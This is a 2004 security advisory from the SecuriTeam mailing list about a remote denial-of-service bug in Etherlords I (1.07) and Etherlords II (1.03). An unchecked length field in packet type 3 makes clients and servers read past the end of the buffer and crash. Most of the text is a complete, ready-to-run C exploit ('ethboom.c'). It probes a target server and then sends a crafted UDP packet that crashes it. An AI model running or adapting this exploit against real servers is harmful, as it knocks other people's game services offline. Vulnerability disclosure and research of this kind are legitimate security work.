[NT] Remote DoS in Etherlords I and Etherlords II (Long Length Field)

From: SecuriTeam (support_at_securiteam.com)
Date: 03/30/04

    To: list@securiteam.com
    Date: 30 Mar 2004 13:16:54 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Remote DoS in Etherlords I and Etherlords II (Long Length Field)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.etherlords.com/etherlords1/> Etherlords is a 3D turn-based
    game developed by <http://www.nival.com> Nival. Etherlords I was released
    in November 2001; Etherlords II was released in October 2003.

    An unchecked buffer allows a remote user to crash game clients or the game
    server.

    DETAILS

    Vulnerable Systems:
     * Etherlords I version 1.07 and earlier
     * Etherlords II version 1.03 and earlier

    The packet identified by type number 3 is normally sent by the server to
    the client; it carries a 16-bit value at offset 9 that specifies the size
    of the data block that follows it.
    Supplying a large number in the 'length' field makes the game crash,
    because it reads unallocated memory beyond the end of the packet.

    Vulnerable Code:
    The following instructions, the inlined memcpy() from Etherlords II 1.03,
    are exactly where the bug happens (the length is used with no check
    against the size of the received packet):
    :0076FD4B C1E902 shr ecx, 02
    :0076FD4E F3A5 rep movsd
    :0076FD50 8BCA mov ecx, edx
    :0076FD52 83E103 and ecx, 003
    :0076FD55 F3A4 rep movsb
    Packet 3 can also be sent to the server, which accepts it and crashes in
    the same way.

    Exploit Code:
    The exploit code requires
    <http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html> winerr.h

    //ethboom.c
    /*
    by Luigi Auriemma

    UNIX & WIN VERSION
    */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #ifdef WIN32
        #include <winsock.h>
        #include "winerr.h"

        #define close closesocket
    #else
        #include <unistd.h>
        #include <sys/socket.h>
        #include <sys/types.h>
        #include <sys/time.h>     /* struct timeval and select(), used by timeout() */
        #include <sys/select.h>
        #include <arpa/inet.h>
        #include <netdb.h>
    #endif

    #define VER "0.1"
    #define BUFFSZ 2048
    #define PORT 9990
    #define TIMEOUT 5
    #define INFO "\x02" "\xde\xad\xc0\xde"
    #define PCK "\x03" \
                    "\x00\x00\x00\x00" \
                    "\x00\x31\x14\x45" \
                    "\xff\xff" /* BOOM */

    int timeout(int sock);
    u_long resolv(char *host);
    void std_err(void);

    int main(int argc, char *argv[]) {
        int sd,
                    len,
                    psz;
        u_short port = PORT;
        u_char *buff;
        struct sockaddr_in peer;

        setbuf(stdout, NULL);

        fputs("\n"
            "Etherlords 1 (1.07) and 2 (1.03) server crash "VER"\n"
            "by Luigi Auriemma\n"
            "e-mail: aluigi@altervista.org\n"
            "web: http://aluigi.altervista.org\n"
            "\n", stdout);

        if(argc < 2) {
            printf("\n"
                "Usage: %s <server> [port(%d)]\n"
                "\n", argv[0], PORT);
            exit(1);
        }

    #ifdef WIN32
        WSADATA wsadata;
        WSAStartup(MAKEWORD(1,0), &wsadata);
    #endif

        if(argc > 2) port = atoi(argv[2]);
        peer.sin_addr.s_addr = resolv(argv[1]);
        peer.sin_port = htons(port);
        peer.sin_family = AF_INET;
        psz = sizeof(peer);

        printf("\nTarget %s:%hu\n\n",
            inet_ntoa(peer.sin_addr), port);

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();

        fputs("- Getting informations:\n", stdout);
        if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, psz)
          < 0) std_err();
        if(timeout(sd) < 0) {
            fputs("\nError: socket timeout, probably the server is not online\n",
                stdout);
            exit(1);
        }

        buff = malloc(BUFFSZ);
        if(!buff) std_err();

        if(recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz)
          < 0) std_err();

        if(*buff == 3) {
            len = buff[11] >> 1;
            printf(" Players: %lu\n", *(u_long *)(buff + len + 12));
            buff[len + 12] = 0x00;
            printf(" Admin nickname: %s\n", buff + 12);
            printf(" Resource level: %lu\n",
                *(u_long *)(buff + len + 12 + 4));
        } else {
            fputs("\nError: Wrong packet from the server, I exit\n", stdout);
            exit(1);
        }

        fputs("- Sending BOOM packet:\n", stdout);
        if(sendto(sd, PCK, sizeof(PCK) - 1, 0, (struct sockaddr *)&peer, psz)
          < 0) std_err();
        if(timeout(sd) < 0) {
            fputs("\nServer IS vulnerable!!!!!!!\n", stdout);
        } else {
            fputs("\nServer doesn't seem to be vulnerable\n", stdout);
        }
        close(sd);

        return(0);
    }

    int timeout(int sock) {
        struct timeval tout;
        fd_set fd_read;
        int err;

        tout.tv_sec = TIMEOUT;
        tout.tv_usec = 0;
        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        err = select(sock + 1, &fd_read, NULL, NULL, &tout);
        if(err < 0) std_err();
        if(!err) return(-1);
        return(0);
    }

    u_long resolv(char *host) {
        struct hostent *hp;
        u_long host_ip;

        host_ip = inet_addr(host);
        if(host_ip == INADDR_NONE) {
            hp = gethostbyname(host);
            if(!hp) {
                printf("\nError: Unable to resolv hostname (%s)\n", host);
                exit(1);
            } else host_ip = *(u_long *)hp->h_addr;
        }
        return(host_ip);
    }

    #ifndef WIN32
        void std_err(void) {
            perror("\nError");
            exit(1);
        }
    #endif

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:aluigi@altervista.org> Luigi
    Auriemma.

